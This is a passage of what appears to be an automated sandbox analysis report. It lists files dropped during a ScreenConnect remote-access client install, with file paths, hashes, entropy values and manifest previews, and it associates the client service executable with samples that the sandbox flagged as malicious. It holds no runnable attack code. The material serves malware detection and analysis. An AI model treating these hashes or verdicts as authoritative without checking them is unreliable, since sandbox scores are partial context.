                                                                                                                                                                                                                                                      SSDEEP:48:+IEAeF7lMDWWuLgJOe6S+9owQX7gq7mLoKp3Ga4FhkG1WllEF/y4hIYX:+sWW+eV+WwQXzmLoK8dF2G10EFq4hIYX
                                                                                                                                                                                                                                                      MD5:380831B71467FAF1FFDC7372BFD30F88
                                                                                                                                                                                                                                                      SHA1:5081C0239A2B14EC1E4531AD867ECA5462B09B69
                                                                                                                                                                                                                                                      SHA-256:D1161B133DA0B8C6A3787FD91BD4151C1D83C1EFBB899486887F52E9E52F516E
                                                                                                                                                                                                                                                      SHA-512:47332D235674546B3405B6AF600C28490602B55C906482E8CA197809BB81DF645CD3F2FC7DD1A99026D2636E2A1228AE87F9FED65F610FB91AB77CE64B90B775
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........s......#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........U..........'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5256
                                                                                                                                                                                                                                                      Entropy (8bit):3.9631034962260023
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Fiw4+RzgZheV+Ww7kkKJOlVx7lMqvfbNwnANbz:FfRzgYJuKS3y7Ap
                                                                                                                                                                                                                                                      MD5:43862C033554FB16396E87AF1527D267
                                                                                                                                                                                                                                                      SHA1:102857E506D1537409B3C773594B57D2DB0C19B6
                                                                                                                                                                                                                                                      SHA-256:B96A4A54A669C8C40F995039E9B5AF3E3DE6B5B951D0E3D3EBA900A4BA6DBA14
                                                                                                                                                                                                                                                      SHA-512:DDEA5B7E65C4E296C1EAAC83686783D79B000030F0CE092A768692E5E3BFCCA4CF31FC98BE845B529CE199A3B0AAA40A28C19DE0184AEDE07C928F922F3EC8D6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........*^?.....4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........U..........[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u".....E..X.%...s".I...R&...F.....Ey)....+.`...m,......;../............... ...#...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$...(...8.......`.......h.......x...(.......................(...............................(... .......H.......P...(...`...................(.......................(...............d...........l.......................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6584
                                                                                                                                                                                                                                                      Entropy (8bit):4.011813215289127
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:7h0PPBpRZeV+Www+8Wp5ONN00UNw8adHR0OpNcmJYMTVqO/t7:2PPMJyp5I6o7pVR
                                                                                                                                                                                                                                                      MD5:D2E5F10CA82E094CC35051B156773FDA
                                                                                                                                                                                                                                                      SHA1:FFDBB2CAD133E412309082CEAE518BC278039C90
                                                                                                                                                                                                                                                      SHA-256:D7EDC6CF2A23BCBAF308033655676FE28CEEC29CFCA44282541E797C29690DE2
                                                                                                                                                                                                                                                      SHA-512:2AE278CC60CD489EB3EE7B724E1EAA0D7D6506222F3F548BEE8B05C74D6573728431A43E982089BD62F1B321B622283C4497B27CBD49781391B7524932E529A4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........c..&.zW.@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........U..............}'.d................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u).....E..X.,...F.....Ey/...O.&r..Vz2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3032
                                                                                                                                                                                                                                                      Entropy (8bit):4.877510471723568
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:6a6Q/c/gJOe6S+9oww7gk7Fw+f7iI++5dFkEM6VbjftNNnwbOA:6aV/c7eV+WwwFFwOiMRkbortNNnEOA
                                                                                                                                                                                                                                                      MD5:497BC772A16CE7B708887C07DA250E9C
                                                                                                                                                                                                                                                      SHA1:93234536891191ADED308D4B57A722B0950728AF
                                                                                                                                                                                                                                                      SHA-256:838A718DB67E740915EBCD5055C9D33BE73B736978D6D4D77FB33ACCB3C5B91C
                                                                                                                                                                                                                                                      SHA-512:76A6BF765B8A55826E22B2ABAE8D39E1C6568709309C0A763C7202C1C8B4C3B83B0B097256901A405CA8BEFB01DB42971280EDEC29AC7CD717899D69CBC7122F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH...........................T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........U............S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14608
                                                                                                                                                                                                                                                      Entropy (8bit):5.715482282631327
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:G17T9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWojO3:G1P9rI6wAX9LX9R/QPIBM7Yj0
                                                                                                                                                                                                                                                      MD5:DC53C825D4BBAF4DB1F7D06E0647E9FA
                                                                                                                                                                                                                                                      SHA1:E74597EC15F95E355839E55AE06483D7DC922216
                                                                                                                                                                                                                                                      SHA-256:BBF11EFA32856814BD7A881787EB9534CFBB3A3C3DF385D12B766CB8C818B3EA
                                                                                                                                                                                                                                                      SHA-512:F534B1D895169AC38E0AD83D3753A128D6624518AAAA2784CFFC568A7350577EA83A4A71834AB3A1897E50B5352BFD48A05D2F9600B3DD2E44B8FF318C76803D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH...........3.t.=$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........U...............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%V..>...V.[;..jq.......O.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.3.8936%........................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4428
                                                                                                                                                                                                                                                      Entropy (8bit):4.197497755898537
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/jCDvx+NgJhe6S+9ow87g5W75uvs/9BnTN41rRp3W6QQCM3RTyA9Uvso9f:/jMeV+Ww8+45ugo1H3RvzRTyOmBf
                                                                                                                                                                                                                                                      MD5:877B52E25DE7E0BA8649C290E7E97AE0
                                                                                                                                                                                                                                                      SHA1:3DD7B8724EB6E455258F0EF42A5ADA369D8CC073
                                                                                                                                                                                                                                                      SHA-256:3FE84FC2B5A6D0A68A16308594F1603566C6FAB032AD5D5207732B1A6884192F
                                                                                                                                                                                                                                                      SHA-512:26C616871CC839B4D045FC6A3C38C31BF9C6FF125A3EB6214588028296B78C8176AC823DD3162D5CD20AE82DF3973932DEB955AD720B5ED8BE59D1CBE0EB4B92
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........4l{yEC..,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........U.............6...................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d......B(...........E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: Qjq85KfhBC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: khwHsyfsJ1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: e5mSvqt7Ho.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: 96r3GgxntQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
